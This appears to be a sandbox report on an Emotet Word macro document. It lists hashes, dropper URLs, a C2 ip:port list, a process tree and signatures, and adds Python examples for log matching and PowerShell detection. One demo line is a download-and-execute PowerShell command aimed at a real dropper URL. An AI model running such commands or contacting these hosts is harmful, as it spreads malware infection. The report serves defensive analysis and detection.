Analysis
-
max time kernel: 54s
max time network: 62s
platform: windows10_x64
resource: win10
submitted: 27-10-2020 16:57
Static task: static1
General
-
Target: emotet_e2_9f01a1f41afb800dc19b023fa3a864efcc17a6c0624897ae4326e695ceb6d893_2020-10-27__165503960551._fpx.doc
Size: 179KB
MD5: 195b26f04a16b641bdcecc5084ca815d
SHA1: 8b87e7f06c75a926103c28fd0b7b8fab532af1a4
SHA256: 9f01a1f41afb800dc19b023fa3a864efcc17a6c0624897ae4326e695ceb6d893
SHA512: 54591f496f64ecbb54158c0c175a3499b4cd7fc346bef6a5439f31f783068dcefc4f626f0e11d72607817103fa9e6c9fb0e85ef4ce146cec491dcd3d0aed3236
Malware Config
Extracted: payload download URLs (maldoc stage; the macro tries these in turn)
http://car4libya.com/cgi-bin/sDBhPqx/
http://ostranderandassociates.com/var/thpY/
http://acredales.com/thank_you/U0u9Z/
http://scw8.net/wp-content/1MkWc/
https://adinterix.com/laybuy-investors/9Ab6/
http://uxnew.com/old/9/
http://www.queensport.nl/accp/dz/
https://bahamianrelief.org/VpHo/ey/
Extracted: emotet, Epoch2 (C2 list, ip:port)
67.163.161.107:80
107.170.146.252:8080
173.212.214.235:7080
167.114.153.111:8080
185.94.252.104:443
110.142.236.207:80
194.187.133.160:443
218.147.193.146:80
172.104.97.173:8080
216.139.123.119:80
50.91.114.38:80
202.134.4.211:8080
113.61.66.94:80
139.99.158.11:443
62.171.142.179:8080
37.139.21.175:8080
190.108.228.27:443
94.23.237.171:443
154.91.33.137:443
201.241.127.190:80
37.179.204.33:80
110.145.77.103:80
72.186.136.247:443
78.24.219.147:8080
200.116.145.225:443
47.36.140.164:80
168.235.67.138:7080
61.76.222.210:80
121.124.124.40:7080
202.134.4.216:8080
190.164.104.62:80
61.19.246.238:443
61.33.119.226:443
98.174.164.72:80
121.7.31.214:80
190.162.215.233:80
24.179.13.119:80
68.252.26.78:80
142.112.10.95:20
220.245.198.194:80
138.68.87.218:443
203.153.216.189:7080
87.106.136.232:8080
95.9.5.93:80
91.146.156.228:80
104.131.11.150:443
5.39.91.110:7080
94.230.70.6:80
209.141.54.221:7080
62.75.141.82:80
172.105.13.66:443
120.150.60.189:80
66.76.12.94:8080
72.143.73.234:443
209.54.13.14:80
172.91.208.86:80
24.178.90.49:80
41.185.28.84:8080
176.113.52.6:443
50.245.107.73:443
176.111.60.55:8080
97.82.79.83:80
85.105.111.166:80
124.41.215.226:80
119.59.116.21:8080
194.4.58.192:7080
115.94.207.99:443
75.143.247.51:80
217.123.207.149:80
162.241.140.129:8080
104.131.123.136:443
50.35.17.13:80
59.125.219.109:443
118.83.154.64:443
37.187.72.193:8080
157.245.99.39:8080
174.106.122.139:80
186.70.56.94:443
186.74.215.34:80
24.230.141.169:80
46.105.131.79:8080
91.211.88.52:7080
172.86.188.251:8080
139.59.60.244:8080
109.74.5.95:8080
190.29.166.0:80
188.219.31.12:80
194.190.67.75:80
182.208.30.18:443
123.142.37.166:80
2.58.16.89:8080
62.30.7.67:443
75.188.96.231:80
123.176.25.234:80
108.46.29.236:80
89.121.205.18:80
78.188.106.53:443
76.175.162.101:80
95.213.236.64:8080
24.137.76.62:80
202.141.243.254:443
184.180.181.202:80
74.214.230.200:80
187.161.206.24:80
68.115.186.26:80
103.86.49.11:8080
190.240.194.77:443
120.150.218.241:443
79.137.83.50:443
49.50.209.131:80
173.63.222.65:80
134.209.144.106:443
112.185.64.233:80
27.114.9.93:80
87.106.139.101:8080
96.245.227.43:80
93.147.212.206:80
139.162.60.124:8080
102.182.93.220:80
89.216.122.92:80
137.59.187.107:8080
74.208.45.104:8080
71.15.245.148:8080
49.3.224.99:8080
94.200.114.161:80
217.20.166.178:7080
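The two indicator lists above are most useful once turned into a matcher over egress logs. The Python below is an added example, not part of this report or of the sandbox's tooling: it copies the report's download URLs and a handful of the Epoch2 C2 entries, validates them, and runs them over a few constructed proxy log lines (the log format and the lines are invented for the demo). It separates an exact ip:port C2 hit from a same-IP/other-port hit, and an exact dropper URL from a bare-host hit, because the dropper URLs sit on otherwise ordinary web sites (note the wp-content and cgi-bin paths), so a host-only match is weak evidence on its own.

```python
"""Match the report's extracted Emotet config against proxy log lines.

Added example, not part of the sandbox report. The indicator lists are copied
from the report's Malware Config section (C2 list trimmed to a few entries);
the log lines and their format are constructed for illustration.
"""
import ipaddress
from urllib.parse import urlsplit

# Payload download URLs extracted from the maldoc (report section "Extracted").
DROPPER_URLS = [
    "http://car4libya.com/cgi-bin/sDBhPqx/",
    "http://ostranderandassociates.com/var/thpY/",
    "http://acredales.com/thank_you/U0u9Z/",
    "http://scw8.net/wp-content/1MkWc/",
    "https://adinterix.com/laybuy-investors/9Ab6/",
    "http://uxnew.com/old/9/",
    "http://www.queensport.nl/accp/dz/",
    "https://bahamianrelief.org/VpHo/ey/",
]
# Epoch2 C2 entries (subset of the report's list).
C2_ENTRIES = [
    "67.163.161.107:80", "107.170.146.252:8080", "173.212.214.235:7080",
    "185.94.252.104:443", "142.112.10.95:20",
]


def parse_c2(entries):
    """Return {ip: {ports}}; malformed entries are skipped rather than trusted."""
    table = {}
    for entry in entries:
        host, sep, port = entry.rpartition(":")
        if not sep or not port.isdigit():
            continue
        try:
            ip = str(ipaddress.ip_address(host))
        except ValueError:
            continue
        table.setdefault(ip, set()).add(int(port))
    return table


def parse_droppers(urls):
    """Return {host: {path}} with hosts lower-cased and paths kept exact."""
    table = {}
    for url in urls:
        parts = urlsplit(url)
        table.setdefault(parts.hostname.lower(), set()).add(parts.path)
    return table


def classify_line(line, c2, droppers):
    """Classify one constructed proxy line: 'ts src method target status'.

    Returns (src, verdict, indicator), or None when the line is clean.
    """
    _ts, src, method, target, _status = line.split()
    if method == "CONNECT":
        host, _, port = target.rpartition(":")
        ports = c2.get(host)
        if ports is None:
            return None
        # Exact ip:port is high confidence; same IP on another port is worth a look.
        verdict = "c2" if int(port) in ports else "c2-ip-other-port"
        return (src, verdict, target)
    parts = urlsplit(target)
    paths = droppers.get((parts.hostname or "").lower())
    if paths is None:
        return None
    # The dropper hosts also serve legitimate pages: only the exact path is strong.
    verdict = "dropper" if parts.path in paths else "dropper-host-only"
    return (src, verdict, target)


LOG_LINES = [  # constructed, not from the report
    "2020-10-27T16:58:01Z 10.0.0.15 GET http://ostranderandassociates.com/var/thpY/ 200",
    "2020-10-27T16:58:40Z 10.0.0.15 CONNECT 173.212.214.235:7080 200",
    "2020-10-27T16:59:02Z 10.0.0.22 GET https://www.example.com/ 200",
    "2020-10-27T16:59:10Z 10.0.0.15 CONNECT 185.94.252.104:443 200",
    "2020-10-27T16:59:30Z 10.0.0.30 CONNECT 185.94.252.104:8443 200",
    "2020-10-27T17:00:05Z 10.0.0.41 GET http://scw8.net/index.php 200",
]


def scan(lines=LOG_LINES):
    """Run every line through the matcher and return the hits in log order."""
    c2 = parse_c2(C2_ENTRIES)
    droppers = parse_droppers(DROPPER_URLS)
    return [hit for hit in (classify_line(l, c2, droppers) for l in lines) if hit]


if __name__ == "__main__":
    for src, verdict, indicator in scan():
        print(f"{src:<12} {verdict:<20} {indicator}")
```

Feed the full C2 list from the report into C2_ENTRIES for real use; the parser drops anything that is not a valid ip:port, so a stray entry cannot silently widen the match.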
Signatures
-
Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro. Here the parent is wmiprvse.exe, the WMI provider host: that is the parent you get when a macro launches PowerShell through WMI (Win32_Process.Create) instead of as a direct child of WINWORD.EXE, so a rule that only watches children of WINWORD.EXE misses this launch.
Processes:
description | pid | pid_target | process | target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 3040 | 3996 | POwersheLL.exe |
Emotet Payload (4 IoCs)
Detects Emotet payload in memory.
Processes:
resource | yara_rule
behavioral1/memory/1636-12-0x0000000000A10000-0x0000000000A30000-memory.dmp | emotet
behavioral1/memory/1636-13-0x0000000000A30000-0x0000000000A4E000-memory.dmp | emotet
behavioral1/memory/512-16-0x00000000004F0000-0x0000000000510000-memory.dmp | emotet
behavioral1/memory/512-17-0x0000000000530000-0x000000000054E000-memory.dmp | emotet
Blacklisted process makes network request (1 IoC)
Processes:
flow | pid | process
20 | 3040 | POwersheLL.exe
Executes dropped EXE (2 IoCs)
Processes:
pid | process
1636 | F1iv94s.exe
512 | qcap.exe
Drops file in System32 directory (1 IoC)
The dropped file carries the same hashes as F1iv94s.exe (see Downloads): the dropper copies itself under SysWOW64 and runs the copy.
Processes:
description | ioc | process
File opened for modification | C:\Windows\SysWOW64\msra\qcap.exe | F1iv94s.exe
Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments. Here the reader is WINWORD.EXE itself, which queries these keys during ordinary startup, so treat this signature as low confidence in isolation; none of the PowerShell or dropped-EXE processes are listed for it.
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WINWORD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WINWORD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WINWORD.EXE
Enumerates system info in registry (2 TTPs, 3 IoCs)
As with the processor keys, the only reader is WINWORD.EXE, so this is routine Office behaviour rather than evidence of the payload fingerprinting the host.
Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | WINWORD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WINWORD.EXE
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WINWORD.EXE
Suspicious behavior: AddClipboardFormatListener (2 IoCs)
Processes:
pid | process
3964 | WINWORD.EXE
3964 | WINWORD.EXE
Suspicious behavior: EnumeratesProcesses (9 IoCs)
Processes:
pid | process | count
3040 | POwersheLL.exe | 3
512 | qcap.exe | 6
Suspicious use of AdjustPrivilegeToken (1 IoC)
Processes:
description | pid | process
Token: SeDebugPrivilege | 3040 | POwersheLL.exe
Suspicious use of SetWindowsHookEx (7 IoCs)
Processes:
pid | process | count
3964 | WINWORD.EXE | 7
Suspicious use of WriteProcessMemory (3 IoCs)
All three writes go from F1iv94s.exe into the qcap.exe process it has just created. CreateProcess itself writes into a new child, so this signature alone does not prove injection; the Emotet memory hits in both PIDs are the stronger evidence.
Processes:
description | pid | process | target process
PID 1636 wrote to memory of 512 | 1636 | F1iv94s.exe | qcap.exe
PID 1636 wrote to memory of 512 | 1636 | F1iv94s.exe | qcap.exe
PID 1636 wrote to memory of 512 | 1636 | F1iv94s.exe | qcap.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE (pid 3964)
  "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\emotet_e2_9f01a1f41afb800dc19b023fa3a864efcc17a6c0624897ae4326e695ceb6d893_2020-10-27__165503960551._fpx.doc" /o ""
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe (pid 3040, parent wmiprvse.exe per Signatures)
  POwersheLL -ENCOD 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
  - Process spawned unexpected child process
  - Blacklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\N_jdesu\N6qw0zr\F1iv94s.exe (pid 1636)
  C:\Users\Admin\N_jdesu\N6qw0zr\F1iv94s.exe
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious use of WriteProcessMemory
  C:\Windows\SysWOW64\msra\qcap.exe (pid 512, child of F1iv94s.exe)
    "C:\Windows\SysWOW64\msra\qcap.exe"
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
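The PowerShell launch is the pivot of this tree: a case-mangled image name (POwersheLL), an abbreviated -ENCOD switch, and wmiprvse.exe rather than WINWORD.EXE as parent (the "Process spawned unexpected child process" signature above). The Python below is an added example, not code from the report or the sandbox: it runs a parent/child rule and a PowerShell command-line normaliser over constructed process-creation events modelled on this tree. Field names follow Sysmon Event ID 1 by assumption, the parent of WINWORD.EXE and the document name are invented, and the encoded payload is built in the demo because the report elides the real one.

```python
"""Parent/child rule plus PowerShell command-line normalisation.

Added example, not part of the sandbox report. EVENTS below are constructed
to mirror the report's process tree and are not real telemetry; field names
(Image, ParentImage, CommandLine) follow Sysmon Event ID 1 by assumption, and
the encoded payload is built here because the report elides the real one.
"""
import base64
import ntpath

# Parents that have no business launching a script host. wmiprvse.exe is the
# WMI provider host: a macro calling Win32_Process.Create yields this parent.
SUSPICIOUS_PARENTS = {"wmiprvse.exe", "winword.exe", "excel.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe", "rundll32.exe", "regsvr32.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Spellings seen in legitimate command lines; anything else is a case mangle.
ORDINARY_PS_SPELLINGS = {"powershell", "PowerShell", "Powershell", "POWERSHELL"}


def base_lower(path):
    """Case-folded file name: 'POwersheLL.exe' and 'powershell.exe' compare equal."""
    return ntpath.basename(path).lower()


def encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None when there is none.

    powershell.exe accepts any unambiguous prefix of a parameter name, so
    -e, -ec, -enc, -ENCOD and -EncodedCommand all select the same switch; the
    argument is base64 of UTF-16LE text.
    """
    toks = cmdline.split()
    for i, tok in enumerate(toks[:-1]):
        if len(tok) > 1 and tok[0] in "-/" and "encodedcommand".startswith(tok[1:].lower()):
            try:
                return base64.b64decode(toks[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None  # switch present but the payload is not decodable
    return None


def odd_capitalisation(cmdline):
    """True when the executable token spells 'powershell' in an unusual case mix."""
    first = cmdline.split()[0].strip('"')
    name = ntpath.basename(first)
    stem = name[:-4] if name.lower().endswith(".exe") else name
    return stem.lower() == "powershell" and stem not in ORDINARY_PS_SPELLINGS


def classify(event):
    """Findings for one process-creation event (empty list means clean)."""
    findings = []
    parent, child = base_lower(event["ParentImage"]), base_lower(event["Image"])
    if parent in SUSPICIOUS_PARENTS and child in SCRIPT_HOSTS:
        findings.append(f"unexpected child: {parent} -> {child}")
    if child in POWERSHELL:
        cmd = event["CommandLine"]
        if odd_capitalisation(cmd):
            findings.append("case-mangled powershell name")
        payload = encoded_command(cmd)
        if payload is not None:
            findings.append("encoded command: " + payload[:60])
    return findings


# Constructed stand-in for the elided payload (not the sample's real script).
DEMO_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://uxnew.com/old/9/')"
DEMO_B64 = base64.b64encode(DEMO_SCRIPT.encode("utf-16-le")).decode("ascii")

EVENTS = [  # constructed, modelled on the report's tree
    {"Image": r"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\invoice.doc" /o ""'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\system32\wbem\wmiprvse.exe",
     "CommandLine": "POwersheLL -ENCOD " + DEMO_B64},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
    {"Image": r"C:\Windows\SysWOW64\msra\qcap.exe",
     "ParentImage": r"C:\Users\Admin\N_jdesu\N6qw0zr\F1iv94s.exe",
     "CommandLine": r'"C:\Windows\SysWOW64\msra\qcap.exe"'},
]


def run(events=EVENTS):
    """Map each event's image name to its findings."""
    return [(base_lower(e["Image"]), classify(e)) for e in events]


if __name__ == "__main__":
    for image, findings in run():
        print(image, findings or "clean")
```

The case check is done on the command line rather than on the Image field because the command line preserves what the launcher typed, and the parameter check accepts every prefix of EncodedCommand so that -e, -ec and -enc are caught alongside the -ENCOD seen here.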
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Admin\N_jdesu\N6qw0zr\F1iv94s.exe
MD5: 73b86e608cfac43a4ea0d3529b1af758
SHA1: 3b6f8aa2ab1fd4930fde3bb80f213a7fa866f5b6
SHA256: 5f3e68bbf85cf781c02d6425366b62f0d069e263026b4edaf0f993bc3f4a80a5
SHA512: e973e3b874ecb8c2ef9bb7056320c0ded679d999dfbd9da0b961fefa656fb2b3f589b86ee89417e92a634611f375bbb74c525fdecb876e653ffc73c0e0635fb4
-
C:\Windows\SysWOW64\msra\qcap.exe (byte-identical copy of F1iv94s.exe: all four hashes match)
MD5: 73b86e608cfac43a4ea0d3529b1af758
SHA1: 3b6f8aa2ab1fd4930fde3bb80f213a7fa866f5b6
SHA256: 5f3e68bbf85cf781c02d6425366b62f0d069e263026b4edaf0f993bc3f4a80a5
SHA512: e973e3b874ecb8c2ef9bb7056320c0ded679d999dfbd9da0b961fefa656fb2b3f589b86ee89417e92a634611f375bbb74c525fdecb876e653ffc73c0e0635fb4
-
Memory dumps
memory dump | size
memory/512-14-0x0000000000000000-mapping.dmp |
memory/512-16-0x00000000004F0000-0x0000000000510000-memory.dmp | 128KB
memory/512-17-0x0000000000530000-0x000000000054E000-memory.dmp | 120KB
memory/1636-12-0x0000000000A10000-0x0000000000A30000-memory.dmp | 128KB
memory/1636-13-0x0000000000A30000-0x0000000000A4E000-memory.dmp | 120KB
memory/3040-7-0x00007FFCA89C0000-0x00007FFCA93AC000-memory.dmp | 9.9MB
memory/3040-8-0x000002861B020000-0x000002861B021000-memory.dmp | 4KB
memory/3040-9-0x000002861B050000-0x000002861B051000-memory.dmp | 4KB
memory/3964-0-0x00007FFCAFB50000-0x00007FFCB0187000-memory.dmp | 6.2MB
The two Emotet-flagged region pairs (pid 1636 and pid 512) have the same layout, a 128KB region directly followed by a 120KB one, which matches the same binary running twice (F1iv94s.exe and its copy qcap.exe share identical hashes).